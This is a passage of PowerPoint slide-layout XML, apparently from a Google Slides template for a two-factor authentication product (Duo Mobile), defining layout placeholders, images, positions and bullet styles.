          <p:cNvPr id="502" name="Google Shape;502;p76"/>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03" name="Google Shape;503;p76"/>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76"/>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05" name="Google Shape;505;p7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06" name="Google Shape;506;p76"/>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F2 - Body with bullets/pattern">
  <p:cSld name="SECTION_HEADER_3">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 507"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="508" name="Google Shape;508;p77"/>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09" name="Google Shape;509;p77"/>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77"/>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511" name="Google Shape;511;p77"/>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512" name="Google Shape;512;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8317850" y="828675"/>
            <a:ext cx="1987200" cy="19872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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3555850" y="828677"/>
            <a:ext cx="3878700" cy="3878700"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1143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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322850" y="4878650"/>
            <a:ext cx="88212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15" name="Google Shape;515;p77"/>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Z1 - DO NOT USE - Blank">
  <p:cSld name="SECTION_HEADER_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 516"/>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1 - Main Point (office)">
  <p:cSld name="SECTION_HEADER_2_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 517"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="518" name="Google Shape;518;p79" descr="Product Shot w2FA_7.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="5896" b="6230"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="25"/>
            <a:ext cx="9143999" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="519" name="Google Shape;519;p79"/>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520" name="Google Shape;520;p79"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2035650" y="1877700"/>
            <a:ext cx="5211900" cy="1175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1" name="Google Shape;521;p79"/>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522" name="Google Shape;522;p79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="51507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523" name="Google Shape;523;p79"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7064700" y="4700875"/>
            <a:ext cx="984229" cy="1777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1 - Graphic only (2FA)">
  <p:cSld name="SECTION_HEADER_2_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 524"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="525" name="Google Shape;525;p80" descr="kendra-iphone-macbook.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="7827" b="7827"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144001" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="526" name="Google Shape;526;p80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="4700872"/>
            <a:ext cx="548700" cy="177778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="527" name="Google Shape;527;p80"/>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528" name="Google Shape;528;p8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529" name="Google Shape;529;p80"/>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F3 - Body with image (Duo Mobile)">
  <p:cSld name="SECTION_HEADER_2_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 530"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="531" name="Google Shape;531;p81"/>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32" name="Google Shape;532;p81"/>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33" name="Google Shape;533;p81" descr="Product Shot - iPhone.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5980436" y="766459"/>
            <a:ext cx="2232351" cy="3610576"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Google Shape;534;p81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295400" y="582175"/>
            <a:ext cx="5620800" cy="80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81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295400" y="2298875"/>
            <a:ext cx="4703100" cy="170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36" name="Google Shape;536;p8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37" name="Google Shape;537;p81"/>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4 - Title (left side)">
  <p:cSld name="TITLE_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 44"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Google Shape;45;p9" descr="kendra_windows-laptop_microsoft-phone.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="31478"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4745775" y="671675"/>
            <a:ext cx="3623400" cy="3685200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Google Shape;46;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287600" y="523250"/>
            <a:ext cx="4311900" cy="1857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5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 name="Google Shape;47;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305650" y="3353123"/>
            <a:ext cx="3794100" cy="1252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pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Google Shape;48;p9"/>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49" name="Google Shape;49;p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0" name="Google Shape;50;p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1 - Subtitle (plain)">
  <p:cSld name="SECTION_HEADER_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 538"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="Google Shape;539;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540" name="Google Shape;540;p82"/>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41" name="Google Shape;541;p8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42" name="Google Shape;542;p82"/>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2 - Subtitle (pattern)">
  <p:cSld name="SECTION_HEADER_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 543"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Google Shape;544;p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63F44"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:srgbClr val="363F4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545" name="Google Shape;545;p83"/>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46" name="Google Shape;546;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4551700" y="-3369206"/>
            <a:ext cx="9143999" cy="4301612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="547" name="Google Shape;547;p83"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4592300" y="4211094"/>
            <a:ext cx="9143999" cy="4301612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="Google Shape;548;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4878650"/>
            <a:ext cx="50223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49" name="Google Shape;549;p83"/>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F4 - Body with bullets (left)" type="tx">
  <p:cSld name="TITLE_AND_BODY">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 550"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Google Shape;551;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2" name="Google Shape;552;p84"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="553" name="Google Shape;553;p84"/>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54" name="Google Shape;554;p8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55" name="Google Shape;555;p84"/>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F5 - Body with bullets (left and pattern)">
  <p:cSld name="TITLE_AND_BODY_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 556"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Google Shape;557;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8" name="Google Shape;558;p85"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="559" name="Google Shape;559;p85"/>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60" name="Google Shape;560;p85"/>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561" name="Google Shape;561;p85"/>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62" name="Google Shape;562;p85"/>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F6 - Body with bullets (double)" type="twoColTx">
  <p:cSld name="TITLE_AND_TWO_COLUMNS">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 563"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="Google Shape;564;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5" name="Google Shape;565;p8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Clr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="Google Shape;566;p8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Clr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-304800" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
              <a:defRPr sz="1200"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="567" name="Google Shape;567;p86"/>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68" name="Google Shape;568;p8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69" name="Google Shape;569;p86"/>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F7 - Body (title only)" type="titleOnly">
  <p:cSld name="TITLE_ONLY">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 570"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Google Shape;571;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2" name="Google Shape;572;p87"/>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73" name="Google Shape;573;p8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74" name="Google Shape;574;p87"/>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F8 - Body (no details, pattern)">
  <p:cSld name="TITLE_ONLY_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 575"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Google Shape;576;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7" name="Google Shape;577;p88"/>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78" name="Google Shape;578;p88"/>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579" name="Google Shape;579;p88"/>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80" name="Google Shape;580;p88"/>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F9 - Body with bullets (narrow)">
  <p:cSld name="ONE_COLUMN_TEXT">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 581"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="582" name="Google Shape;582;p8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3" name="Google Shape;583;p89"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1389600"/>
            <a:ext cx="33408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584" name="Google Shape;584;p89"/>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85" name="Google Shape;585;p8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86" name="Google Shape;586;p89"/>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3 - Subtitle (plain)">
  <p:cSld name="MAIN_POINT">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 587"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="588" name="Google Shape;588;p90"/>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589" name="Google Shape;589;p90"/>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90" name="Google Shape;590;p9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91" name="Google Shape;591;p90"/>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4 - Subtitle (green)">
  <p:cSld name="MAIN_POINT_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 592"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593" name="Google Shape;593;p91"/>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594" name="Google Shape;594;p9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595" name="Google Shape;595;p9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596" name="Google Shape;596;p91"/>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1 - Body with bullets" type="secHead">
  <p:cSld name="SECTION_HEADER">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 51"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="Google Shape;52;p10"/>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3" name="Google Shape;53;p10"/>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0"/>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5" name="Google Shape;55;p1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6" name="Google Shape;56;p10"/>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5 - Subtitle (navy)">
  <p:cSld name="MAIN_POINT_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="374044"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 597"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Google Shape;598;p92"/>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599" name="Google Shape;599;p92"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00" name="Google Shape;600;p9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01" name="Google Shape;601;p92"/>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F9 - Body (image right)">
  <p:cSld name="SECTION_TITLE_AND_DESCRIPTION">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 602"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="603" name="Google Shape;603;p9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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265500" y="1233175"/>
            <a:ext cx="413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05" name="Google Shape;605;p93"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265500" y="2803075"/>
            <a:ext cx="41352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pic>
        <p:nvPicPr>
          <p:cNvPr id="606" name="Google Shape;606;p93"/>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607" name="Google Shape;607;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341700" y="4878650"/>
            <a:ext cx="88785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608" name="Google Shape;608;p93"/>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F10 - Body (image left)">
  <p:cSld name="SECTION_TITLE_AND_DESCRIPTION_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 609"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="610" name="Google Shape;610;p94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008800" y="1233175"/>
            <a:ext cx="36006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12" name="Google Shape;612;p94"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008800" y="2803075"/>
            <a:ext cx="36006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13" name="Google Shape;613;p9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614" name="Google Shape;614;p94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5850700" y="4700875"/>
            <a:ext cx="984229" cy="177775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="615" name="Google Shape;615;p94"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5132725" y="4700872"/>
            <a:ext cx="548700" cy="177778"/>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F11 - Body (recap of main points, pattern)">
  <p:cSld name="CUSTOM_8_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 616"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Google Shape;617;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8" name="Google Shape;618;p95"/>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619" name="Google Shape;619;p95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-626250" y="2469818"/>
            <a:ext cx="1258800" cy="12588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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8098513" y="804077"/>
            <a:ext cx="1258800" cy="12588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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117275" y="3656132"/>
